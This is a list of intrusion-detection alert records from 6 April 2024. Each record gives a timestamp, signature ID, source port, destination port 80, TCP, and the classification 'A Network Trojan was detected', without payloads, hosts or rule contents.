                          Timestamp:04/06/24-09:30:20.206304
                          SID:2025381
                          Source Port:49792
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:42.690473
                          SID:2021641
                          Source Port:49746
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:02.332845
                          SID:2021641
                          Source Port:49844
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:45.018070
                          SID:2024318
                          Source Port:49749
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:53.470085
                          SID:2024313
                          Source Port:49758
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:06.206380
                          SID:2825766
                          Source Port:49849
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:52.096160
                          SID:2025381
                          Source Port:49833
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:45.018070
                          SID:2024313
                          Source Port:49749
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:04.659572
                          SID:2024313
                          Source Port:49847
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:47.378472
                          SID:2024318
                          Source Port:49752
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:53.470085
                          SID:2024318
                          Source Port:49758
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:51.123133
                          SID:2021641
                          Source Port:49755
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:41.115114
                          SID:2025381
                          Source Port:49744
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:00.769505
                          SID:2025381
                          Source Port:49842
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:04.659572
                          SID:2024318
                          Source Port:49847
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:47.378472
                          SID:2024313
                          Source Port:49752
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:06.999341
                          SID:2024313
                          Source Port:49850
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:10.531874
                          SID:2825766
                          Source Port:49778
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:55.812911
                          SID:2024313
                          Source Port:49761
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:12.096911
                          SID:2825766
                          Source Port:49781
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:02.046578
                          SID:2025381
                          Source Port:49769
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:10.846749
                          SID:2024318
                          Source Port:49856
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:11.314149
                          SID:2024318
                          Source Port:49780
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:10.846749
                          SID:2024313
                          Source Port:49856
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:31.907019
                          SID:2825766
                          Source Port:49807
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:43.503603
                          SID:2024318
                          Source Port:49822
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:48.181654
                          SID:2024318
                          Source Port:49828
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:36.516498
                          SID:2025381
                          Source Port:49814
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:31.298967
                          SID:2021641
                          Source Port:49727
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:48.181654
                          SID:2024313
                          Source Port:49828
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:27.109787
                          SID:2021641
                          Source Port:49721
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:05.891670
                          SID:2021641
                          Source Port:49774
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:38.088060
                          SID:2021641
                          Source Port:49816
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:03.119856
                          SID:2021641
                          Source Port:49845
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:11.314149
                          SID:2024313
                          Source Port:49780
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:24.839758
                          SID:2825766
                          Source Port:49718
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:54.259588
                          SID:2825766
                          Source Port:49759
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:15.972978
                          SID:2825766
                          Source Port:49787
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:43.503603
                          SID:2024313
                          Source Port:49822
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:05.441892
                          SID:2825766
                          Source Port:49848
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:15.205072
                          SID:2024313
                          Source Port:49786
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:17.112021
                          SID:2025381
                          Source Port:49788
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:04.359604
                          SID:2025381
                          Source Port:49772
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:12.357168
                          SID:2021641
                          Source Port:49858
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:14.663983
                          SID:2025381
                          Source Port:49861
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:15.205072
                          SID:2024318
                          Source Port:49786
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:13.897343
                          SID:2825766
                          Source Port:49860
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:48.178974
                          SID:2825766
                          Source Port:49753
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:24.137227
                          SID:2024317
                          Source Port:49717
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:31.133120
                          SID:2024318
                          Source Port:49806
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:44.269499
                          SID:2825766
                          Source Port:49823
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:28.779878
                          SID:2024318
                          Source Port:49803
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:24.137227
                          SID:2024312
                          Source Port:49717
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:13.117986
                          SID:2025381
                          Source Port:49859
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:35.705322
                          SID:2825766
                          Source Port:49734
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:31.133120
                          SID:2024313
                          Source Port:49806
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:26.328739
                          SID:2024318
                          Source Port:49720
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:36.488685
                          SID:2825766
                          Source Port:49737
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:28.779878
                          SID:2024313
                          Source Port:49803
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:08.980641
                          SID:2025381
                          Source Port:49776
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:15.972978
                          SID:2021641
                          Source Port:49787
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:26.424765
                          SID:2021641
                          Source Port:49800
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:26.328739
                          SID:2024313
                          Source Port:49720
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:25.641172
                          SID:2024318
                          Source Port:49799
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:14.423119
                          SID:2025381
                          Source Port:49785
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:38.036927
                          SID:2825766
                          Source Port:49740
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:19.440133
                          SID:2025381
                          Source Port:49791
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:51.314444
                          SID:2825766
                          Source Port:49832
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:25.641172
                          SID:2024313
                          Source Port:49799
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:03.891737
                          SID:2025381
                          Source Port:49846
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:13.897343
                          SID:2021641
                          Source Port:49860
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:18.674487
                          SID:2825766
                          Source Port:49790
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:27.906071
                          SID:2025381
                          Source Port:49722
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:09.757970
                          SID:2024313
                          Source Port:49777
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:29.547586
                          SID:2825766
                          Source Port:49804
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:03.603579
                          SID:2021641
                          Source Port:49771
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:30.339047
                          SID:2025381
                          Source Port:49805
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:24.825007
                          SID:2024313
                          Source Port:49872
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:39.686953
                          SID:2024318
                          Source Port:49819
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:50.516269
                          SID:2024318
                          Source Port:49831
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:52.706701
                          SID:2025381
                          Source Port:49757
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:54.259588
                          SID:2021641
                          Source Port:49759
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:09.757970
                          SID:2024318
                          Source Port:49777
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:24.839758
                          SID:2021641
                          Source Port:49718
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:50.516269
                          SID:2024313
                          Source Port:49831
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:55.812911
                          SID:2024318
                          Source Port:49761
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:07.768549
                          SID:2825766
                          Source Port:49851
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:27.109787
                          SID:2825766
                          Source Port:49721
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:57.360186
                          SID:2025381
                          Source Port:49763
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:39.686953
                          SID:2024313
                          Source Port:49819
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:06.999341
                          SID:2024318
                          Source Port:49850
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:56.595283
                          SID:2825766
                          Source Port:49762
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:18.674487
                          SID:2021641
                          Source Port:49790
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:34.204192
                          SID:2825766
                          Source Port:49810
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:59.991734
                          SID:2021641
                          Source Port:49841
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:02.332845
                          SID:2024313
                          Source Port:49844
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:40.344957
                          SID:2021641
                          Source Port:49743
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:49.735329
                          SID:2025381
                          Source Port:49830
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:10.080334
                          SID:2825766
                          Source Port:49855
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:55.035047
                          SID:2825766
                          Source Port:49760
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:39.580792
                          SID:2825766
                          Source Port:49742
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:20.206304
                          SID:2024318
                          Source Port:49792
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:34.079276
                          SID:2025381
                          Source Port:49729
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:03.119856
                          SID:2025381
                          Source Port:49845
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:47.361321
                          SID:2025381
                          Source Port:49827
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:02.332845
                          SID:2024318
                          Source Port:49844
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:58.128553
                          SID:2024318
                          Source Port:49764
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:58.128553
                          SID:2024313
                          Source Port:49764
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:45.799677
                          SID:2025381
                          Source Port:49750
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:27.109787
                          SID:2024313
                          Source Port:49721
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:12.861151
                          SID:2024313
                          Source Port:49782
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:13.117986
                          SID:2024313
                          Source Port:49859
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:53.470085
                          SID:2021641
                          Source Port:49758
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:08.980641
                          SID:2021641
                          Source Port:49776
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:35.733011
                          SID:2025381
                          Source Port:49812
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:13.117986
                          SID:2024318
                          Source Port:49859
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:27.109787
                          SID:2024318
                          Source Port:49721
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:55.220105
                          SID:2825766
                          Source Port:49837
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:19.370644
                          SID:2825766
                          Source Port:49865
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:02.814837
                          SID:2825766
                          Source Port:49770
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:22.429106
                          SID:2024313
                          Source Port:49869
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:01.279270
                          SID:2021641
                          Source Port:49768
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:12.861151
                          SID:2024318
                          Source Port:49782
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:39.686953
                          SID:2825766
                          Source Port:49819
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:22.429106
                          SID:2024318
                          Source Port:49869
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:38.088060
                          SID:2024318
                          Source Port:49816
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:10.080334
                          SID:2025381
                          Source Port:49855
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:47.378472
                          SID:2825766
                          Source Port:49752
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:29.470677
                          SID:2825766
                          Source Port:49724
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:20.970310
                          SID:2825766
                          Source Port:49793
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:38.088060
                          SID:2024313
                          Source Port:49816
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:15.205072
                          SID:2021641
                          Source Port:49786
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:58.921065
                          SID:2825766
                          Source Port:49765
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:20.206304
                          SID:2024313
                          Source Port:49792
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:04.659572
                          SID:2825766
                          Source Port:49847
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:27.986411
                          SID:2025381
                          Source Port:49802
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:24.137227
                          SID:2021641
                          Source Port:49717
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:00.493399
                          SID:2025381
                          Source Port:49767
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:38.861510
                          SID:2024313
                          Source Port:49818
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:27.906071
                          SID:2825766
                          Source Port:49722
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:11.314149
                          SID:2825766
                          Source Port:49780
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:12.096911
                          SID:2021641
                          Source Port:49781
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:20.907030
                          SID:2024318
                          Source Port:49867
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:20.907030
                          SID:2024313
                          Source Port:49867
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:48.957388
                          SID:2825766
                          Source Port:49829
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:29.547586
                          SID:2025381
                          Source Port:49804
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:46.581121
                          SID:2024318
                          Source Port:49751
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:28.779878
                          SID:2021641
                          Source Port:49803
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:56.772335
                          SID:2024313
                          Source Port:49839
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:11.610579
                          SID:2825766
                          Source Port:49857
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:38.799315
                          SID:2024313
                          Source Port:49741
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:25.641172
                          SID:2021641
                          Source Port:49799
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:23.301208
                          SID:2021641
                          Source Port:49796
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:38.799315
                          SID:2024318
                          Source Port:49741
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:56.772335
                          SID:2024318
                          Source Port:49839
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:38.861510
                          SID:2024318
                          Source Port:49818
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:36.516498
                          SID:2825766
                          Source Port:49814
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:09.316933
                          SID:2025381
                          Source Port:49853
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:19.440133
                          SID:2021641
                          Source Port:49791
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:21.735500
                          SID:2021641
                          Source Port:49794
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:57.593507
                          SID:2025381
                          Source Port:49840
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:21.669304
                          SID:2825766
                          Source Port:49868
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:48.178974
                          SID:2021641
                          Source Port:49753
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:31.298967
                          SID:2825766
                          Source Port:49727
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:51.123133
                          SID:2825766
                          Source Port:49755
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:12.357168
                          SID:2025381
                          Source Port:49858
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:50.516269
                          SID:2021641
                          Source Port:49831
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:24.825007
                          SID:2021641
                          Source Port:49872
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:19.440133
                          SID:2825766
                          Source Port:49791
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:30.251229
                          SID:2021641
                          Source Port:49725
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:38.036927
                          SID:2025381
                          Source Port:49740
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:18.674487
                          SID:2024318
                          Source Port:49790
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:46.592042
                          SID:2024313
                          Source Port:49826
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:37.260471
                          SID:2025381
                          Source Port:49739
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:46.592042
                          SID:2024318
                          Source Port:49826
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:18.674487
                          SID:2024313
                          Source Port:49790
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:59.690030
                          SID:2021641
                          Source Port:49766
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:45.799677
                          SID:2825766
                          Source Port:49750
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:47.361321
                          SID:2825766
                          Source Port:49827
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:22.504191
                          SID:2024313
                          Source Port:49795
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:08.547895
                          SID:2825766
                          Source Port:49852
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:22.504191
                          SID:2024318
                          Source Port:49795
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:21.669304
                          SID:2021641
                          Source Port:49868
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:52.865138
                          SID:2825766
                          Source Port:49834
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:05.124910
                          SID:2021641
                          Source Port:49773
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
